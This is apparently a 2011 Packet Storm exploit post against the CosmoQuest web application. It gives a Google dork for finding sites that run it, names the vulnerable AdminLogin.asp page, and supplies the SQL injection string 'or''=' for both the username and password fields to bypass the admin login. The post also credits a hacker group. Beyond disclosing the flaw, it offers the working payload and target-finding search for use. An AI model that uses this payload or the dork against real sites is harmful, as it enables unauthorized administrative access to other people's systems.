CosmoQuest suffers from a remote SQL injection vulnerability that allows for authentication bypass.
cdb6b3dfcff09aa7e0f16347c50028ee2aabac05697ca7308b35e034551842a8==========================================
CosmoQuest bypass login page Vulnerability
==========================================
[~]######################################### InformatioN
[~] Title : CosmoQuest bypass login page Vulnerability
[~] Author : Net.Edit0r
[~] Vendor or Software Link : http://www.cosmoquest.info/
[~] Email : Black.hat.tm@gmail.com
[~] Data : 2011-03-29
[~] Google dork: "Powered by CosmoQuest"
[~] Category: [Webapps]
[~] Tested on: [Linux /php]
[~]######################################### ExploiT
[~] Vulnerable File :
AdminLogin.asp
[~] ExploiT :
http://127.0.0.1/AdminLogin.asp
user: 'or''='
pass: 'or''='
[~] ######################################### ThankS To ...
[~] Black Hat Group Member :
Net.Edit0r & DarkCoder & fronk & Amir-MaGic & H3x & Milad.C0nn3ct0r #BHG
[~] IRANIAN Young HackerZ # Persian Gulf
[~]######################################### FinisH :D
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed